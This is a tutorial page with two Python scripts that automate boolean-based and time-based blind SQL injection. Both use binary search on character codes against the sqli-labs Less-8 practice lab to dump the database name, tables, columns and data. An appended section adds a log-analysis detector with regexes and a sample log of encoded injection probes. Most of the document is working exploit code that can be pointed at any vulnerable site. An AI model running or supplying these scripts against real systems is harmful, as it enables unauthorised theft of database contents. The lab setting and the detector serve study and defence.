
SQL injection with binary search: boolean-based and time-based blind injection

1. Boolean-based blind injection:

```python
import requests


def binary_search_character(url, query, index, low=32, high=127):
    # Binary-search the ASCII value of the character at `index` of the query result:
    # the page shows "You are in.........." only when the injected condition is true.
    while low < high:
        mid = (low + high + 1) // 2
        payload = f"1' AND ASCII(SUBSTRING(({query}),{index},1)) >= {mid} -- "
        res = {"id": payload}
        r = requests.get(url, params=res)
        if "You are in.........." in r.text:
            low = mid
        else:
            high = mid - 1
    # Past the end of the string SUBSTRING() is '' and ASCII('') is 0, so low stays
    # at 32 and the empty return value ends the extraction loop.
    return chr(low) if low > 32 else ''


def extract_data(url, query):
    # Not shown on the original page; reconstructed from how it is called below:
    # read the result one character at a time until an empty character comes back.
    result = ''
    index = 1
    while True:
        ch = binary_search_character(url, query, index)
        if not ch:
            break
        result += ch
        index += 1
    return result


if __name__ == '__main__':
    url = 'http://127.0.0.1/sqlilabs/Less-8/index.php'
    database_name = extract_data(url, "SELECT database()")
    print(f"数据库名: {database_name}")
    table_name_query = f"SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema='{database_name}'"
    table_names = extract_data(url, table_name_query)
    print(f"表名: {table_names}")
    table_name = table_names.split(',')[0]
    column_name_query = f"SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='{table_name}' AND table_schema='{database_name}'"
    column_names = extract_data(url, column_name_query)
    print(f"列名: {column_names}")
    column_name = column_names.split(',')[1]
    data_query = f"SELECT GROUP_CONCAT({column_name}) FROM {database_name}.{table_name}"
    extracted_values = extract_data(url, data_query)
    print(f"数据: {extracted_values}")
```

2. Time-based blind injection:

```python
import requests
import time


def binary_search_character(url, query, index, low=32, high=127):
    # Same binary search as above, but the oracle is response time: the condition
    # is wrapped in IF(..., SLEEP(2), 0), so a slow reply means the condition held.
    while low < high:
        mid = (low + high + 1) // 2
        payload = f"1' AND IF(ASCII(SUBSTRING(({query}),{index},1)) >= {mid}, SLEEP(2), 0) -- "
        res = {"id": payload}
        start_time = time.time()
        r = requests.get(url, params=res)
        response_time = time.time() - start_time
        if response_time > 1.5:  # a delayed response means the condition held
            low = mid
        else:
            high = mid - 1
    return chr(low) if low > 32 else ''


def extract_data(url, query):
    # Not shown on the original page; reconstructed from how it is called below:
    # read the result one character at a time until an empty character comes back.
    result = ''
    index = 1
    while True:
        ch = binary_search_character(url, query, index)
        if not ch:
            break
        result += ch
        index += 1
    return result


if __name__ == '__main__':
    url = 'http://127.0.0.1/sqlilabs/Less-8/index.php'
    database_name = extract_data(url, "SELECT database()")
    print(f"数据库名: {database_name}")
    table_name_query = f"SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema='{database_name}'"
    table_names = extract_data(url, table_name_query)
    print(f"表名: {table_names}")
    table_name = table_names.split(',')[0]
    column_name_query = f"SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='{table_name}' AND table_schema='{database_name}'"
    column_names = extract_data(url, column_name_query)
    print(f"列名: {column_names}")
    column_name = column_names.split(',')[1]
    data_query = f"SELECT GROUP_CONCAT({column_name}) FROM {database_name}.{table_name}"
    extracted_values = extract_data(url, data_query)
    print(f"数据: {extracted_values}")
```
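A defender-side counterpart, added here and not part of the original post: it scans a constructed access-log excerpt for the probe shapes the two scripts above emit (an `ASCII(SUBSTRING(...)) >= N` comparison, or the same comparison gated by `SLEEP()`), aggregates them per client IP, and notes when a `SLEEP()` probe actually coincided with a slow response. It assumes a combined-log format with the request service time in seconds appended as the last field; the IPs and timestamps are invented.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed access-log excerpt (not from the original post); assumed combined-log format with the service time (seconds) as the last field.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Mar/2025:10:00:01 +0000] "GET /sqlilabs/Less-8/index.php?id=1 HTTP/1.1" 200 512 0.012
10.0.0.7 - - [01/Mar/2025:10:00:02 +0000] "GET /sqlilabs/Less-8/index.php?id=1%27+AND+ASCII%28SUBSTRING%28%28SELECT+database%28%29%29%2C1%2C1%29%29+%3E%3D+80+--+ HTTP/1.1" 200 512 0.011
10.0.0.7 - - [01/Mar/2025:10:00:02 +0000] "GET /sqlilabs/Less-8/index.php?id=1%27+AND+ASCII%28SUBSTRING%28%28SELECT+database%28%29%29%2C1%2C1%29%29+%3E%3D+104+--+ HTTP/1.1" 200 512 0.010
10.0.0.7 - - [01/Mar/2025:10:00:03 +0000] "GET /sqlilabs/Less-8/index.php?id=1%27+AND+IF%28ASCII%28SUBSTRING%28%28SELECT+database%28%29%29%2C2%2C1%29%29+%3E%3D+80%2C+SLEEP%282%29%2C+0%29+--+ HTTP/1.1" 200 512 2.004
10.0.0.9 - - [01/Mar/2025:10:00:04 +0000] "GET /sqlilabs/Less-8/index.php?id=2 HTTP/1.1" 200 498 0.009
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
                    r'(?P<status>\d{3}) \S+ (?P<secs>[\d.]+)$')
# Probe shapes from the scripts above, matched after URL-decoding; BENCHMARK() is the other common MySQL delay primitive.
BOOL_PROBE = re.compile(r"ASCII\s*\(\s*SUBSTRING\s*\(", re.I)
TIME_PROBE = re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I)
THRESHOLD = re.compile(r">=\s*(\d+)")

def classify_request(path):
    """Return 'time-blind', 'boolean-blind' or None for one (encoded) request path."""
    decoded = unquote_plus(path)
    if TIME_PROBE.search(decoded):
        return "time-blind"
    if BOOL_PROBE.search(decoded):
        return "boolean-blind"
    return None

def analyze_log(text, slow_threshold=1.5):
    """Per-IP probe counts, SLEEP() probes that really were slow, and the comparison thresholds seen."""
    stats = defaultdict(lambda: {"boolean-blind": 0, "time-blind": 0, "slow_time_probes": 0, "thresholds": []})
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        kind = classify_request(m["path"])
        if kind is None:
            continue
        rec = stats[m["ip"]]
        rec[kind] += 1
        if kind == "time-blind" and float(m["secs"]) >= slow_threshold:
            rec["slow_time_probes"] += 1  # the delay was observed: the injected SQL executed
        rec["thresholds"] += [int(v) for v in THRESHOLD.findall(unquote_plus(m["path"]))]
    return dict(stats)

def flagged_clients(stats, min_probes=2):
    """IPs whose probe volume looks like a character-extraction loop rather than a one-off test."""
    return sorted(ip for ip, r in stats.items() if r["boolean-blind"] + r["time-blind"] >= min_probes)
```

A sequence of thresholds that narrows toward one value per character position (80, 104, ... in the sample) is the binary-search fingerprint; a WAF or log pipeline can alert on that pattern even when individual requests return 200.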

http://www.lryc.cn/news/538682.html
